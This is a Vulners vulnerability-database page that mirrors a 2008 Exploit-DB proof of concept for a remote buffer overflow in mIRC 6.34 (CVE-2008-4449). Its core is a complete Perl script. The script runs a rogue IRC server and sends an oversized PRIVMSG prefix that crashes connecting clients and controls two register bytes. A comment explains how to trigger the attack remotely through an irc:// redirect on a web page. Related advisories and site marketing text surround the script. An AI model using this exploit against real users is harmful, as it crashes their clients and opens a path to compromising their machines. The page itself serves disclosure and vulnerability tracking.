Lucene search
+L

mIRC 6.34 - Remote Buffer Overflow (PoC)

🗓️ 02 Oct 2008 00:00:00Reported by securfrogType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

mIRC 6.34 remote buffer overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-4449
2 Oct 200800:00
circl
checkpoint_advisories
Check Point Advisories
Update Protection against mIRC PRIVMSG Message Processing Buffer Overflow
24 Oct 200800:00
checkpoint_advisories
checkpoint_advisories
Check Point Advisories
mIRC PRIVMSG Message Processing Buffer Overflow (CVE-2008-4449)
6 Dec 200900:00
checkpoint_advisories
cve
CVE
CVE-2008-4449
6 Oct 200819:00
cve
cvelist
Cvelist
CVE-2008-4449
6 Oct 200819:00
cvelist
exploitdb
Exploit DB
mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow (Metasploit)
22 Jun 201000:00
exploitdb
exploitdb
Exploit DB
mIRC 6.34 - Remote Buffer Overflow
4 Oct 200800:00
exploitdb
nessus
Tenable Nessus
mIRC PRIVMSG Handling Remote Buffer Overflow
22 Oct 200800:00
nessus
metasploit
Metasploit
mIRC PRIVMSG Handling Stack Buffer Overflow
15 Jul 200911:44
metasploit
nvd
NVD
CVE-2008-4449
6 Oct 200819:56
nvd
Rows per page
##################################################################################################
# Mirc 6.34 Remote Buffer Overflow
#
# This poc allow you to own the 2 first EDI & EDX bytes.
#
# To become remote, add a simple document.location.href=irc://server.com/... in some html page
#
use IO::Socket;

sub sock()
{
my $sock=new IO::Socket::INET (
Listen    => 1,

LocalAddr => 'localhost',

LocalPort => 6667,

Proto     => 'tcp');  die unless $sock;

print " [+]IRC Server started on port 6667 \r\n";

$s=$sock->accept();
$a = "A" x 313;
$twobytes = "\x43\x43";

print " [+]Sending pickles\r\n";

print $s ":irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow\r\n";
sleep(1);
print $s ":".$a.$twobytes." PRIVMSG  yow : /FINGER yow.\r\n";
}
while(1)
{
sock();
print " [+]Mirc should be down now, another little friend comming ?\r\n [+]Server Restarting\r\n";
}

# milw0rm.com [2008-10-02]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Nov 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.38737
24